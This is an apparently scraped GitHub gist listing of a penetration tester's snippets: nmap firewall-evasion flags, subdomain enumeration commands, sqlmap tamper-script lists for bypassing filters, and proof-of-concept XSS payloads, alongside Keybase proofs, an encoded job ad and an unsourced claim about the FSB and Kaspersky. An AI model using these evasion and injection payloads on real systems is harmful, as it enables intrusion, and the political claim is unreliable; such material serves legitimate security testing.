(Preferably) Use a VPN
- AlgoVPN https://github.com/trailofbits/algo
- OpenVPN (AS) https://openvpn.net/index.php/access-server/overview.html
- 3rd party service, e.g. ProtonVPN https://protonvpn.com
Install a proxy tool of choise
Vlad Styran sapran
sapran
/ nmap_firewall
Created
March 18, 2018 17:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nmap options/ideas to avoid Firewall | |
| fragmentation | |
| -f | |
| change default MTU | |
| --mtu 24 | |
| random number of decoys | |
| -D RND:10 |
sapran
/ mobileapppentestingworksho.md
Last active
December 25, 2023 10:00
Links and snippets for mobile app pentesting workshop
sapran
/ Berezha-job
Last active
January 28, 2018 09:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| We are hiring! | |
| We will be happy to offer a long term contract to a Senior Offensive Security Professional. (1/6) | |
| SW50cm8KVGhpcyBpcyBhIHBlcm1hbmVudCByb2xlIGluIEJlcmV6aGEgU2VjdXJpdHksIGEgdGhyZWUgeWVhciBvbGQgVWtyYWluaWFuIGN5YmVyLXNlY3VyaXR5IGNvbXBhbnkgdGhhdCBpcyBmb2N1c2VkIG9uIFNlY3VyaXR5IENvbnN1bHRpbmcsIFNvZnR3YXJlIFNlY3VyaXR5LCBhbmQgU2VjdXJpdHkgQXNzZXNzbWVudHMuIEluIGEgbWlkLXRlcm0gcGVyc3BlY3RpdmUsIHdlIGV4cGVjdCB0aGlzIHBvc2l0aW9uIHRvIHRyYW5zZm9ybSBpbnRvIGEgVGVjaCBMZWFkIHJvbGUgb2Ygb3VyIE9mZmVuc2l2ZSBTZWN1cml0eSBwcmFjdGljZS4gKDIvNikKCjU0Njg2NTIwNmE2ZjYyMGEyZDIwNTM2ZjY2NzQ3NzYxNzI2NTIwNzM2NTYzNzU3MjY5NzQ3OTIwNjE3MzczNjU3MzczNmQ2NTZlNzQ3MzJjMjA3MDY1NmU2NTc0NzI2MTc0Njk2ZjZlMjA3NDY1NzM3NDczMmMyMDZiNmU2Zjc3NmM2NTY0Njc2NTIwNzM2ODYxNzI2OTZlNjcyMDczNjU3MzczNjk2ZjZlNzMyZTBhMmQyMDU3NmY3MjZiNmM2ZjYxNjQyMDY1Nzg3MDY1NjM3NDYxNzQ2OTZmNmUzYTIwMzQzMDIwNjg2Zjc1NzI3MzIwNzA2NTcyMjA3NzY1NjU2YjJjMjA3MDYxNjk2NDIwNmY3NjY1NzI3NDY5NmQ2NTczMmUwYTJkMjA0ZjY2NjY2OTYzNjUyYzIwNzI2NTZkNmY3NDY1MmMyMDZmNmUyZDczNjk3NDY1MjA2MTc0MjA3NDY4NjUyMDYzNmM2O |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| find ./ -type f | parallel -j150% grep -f ./patterns.txt {} > ./result.txt |
sapran
/ subdomain_scraping
Created
December 10, 2017 12:02
DNS subdomain scraping techniques
Source: https://www.youtube.com/watch?v=C4ZHAdI8o1w
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # GoBuster | |
| ``` | |
| gobuster -m dns -u $DOMAIN -t 100 -w all.txt | |
| ``` | |
| # MassDNS | |
| ``` | |
| ./subbrute.py all.txt $DOMAIN | massdns -r resolvers.txt -t A -a -o -w massdns_output.txt - | |
| ``` |
sapran
/ sqlmap tamper scripts
Last active
December 17, 2023 02:52
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
sapran
/ keybase.md
Created
March 15, 2017 12:05
I hereby claim:
- I am sapran on github.
- I am sapran (https://keybase.io/sapran) on keybase.
- I have a public key whose fingerprint is EA74 4EC9 18CA BA16 4912 D417 A2A3 AE1B E7C9 D1FE
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| It is known that Sergey Mikhailov headed the department at the Center for Information Security of the FSB, which was responsible for the work of the hacker environment. He coordinated the activities of hacker groups who carried out the orders of the FSB cyber attacks on information resources in Ukraine, the EU and the US. A Kaspersky Lab works closely with the FSB in the context of the collection of personal and sensitive data of its customers to transfer their Russian security services. Its Inbuilt Antivirus spyware. It was found by experts including the NSA and the FBI. In my view, the arrest of both main performers of Russian cyber attacks on the resources of the US is an attempt to "hide the wiser." Clean Up individuals who can testify ties hackers and senior FSB. This effectively - removing intermediaries that were involved in the raid have a long tradition NKVD-KGB-FSB. The question of whether these people eventually eliminated the answers I have. |
sapran
/ Simple XSS payloads
Last active
April 10, 2024 17:51
— forked from funkaoshi/XSS Strings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " onfocus="alert(1)" name="bounty | |
| (Append #bounty to the URL and enjoy your zero interaction XSS ) | |
| <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
| # Internet Explorer, Edge | |
| <svg><script>alert(1)<p> | |
| # Firefox |
sapran
/ gist:8f03c6f8e1e55fe67152
Created
August 18, 2015 12:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am sapran on github. | |
| * I am sapran (https://keybase.io/sapran) on keybase. | |
| * I have a public key whose fingerprint is EA74 4EC9 18CA BA16 4912 D417 A2A3 AE1B E7C9 D1FE | |
| To claim this, I am signing this object: |
NewerOlder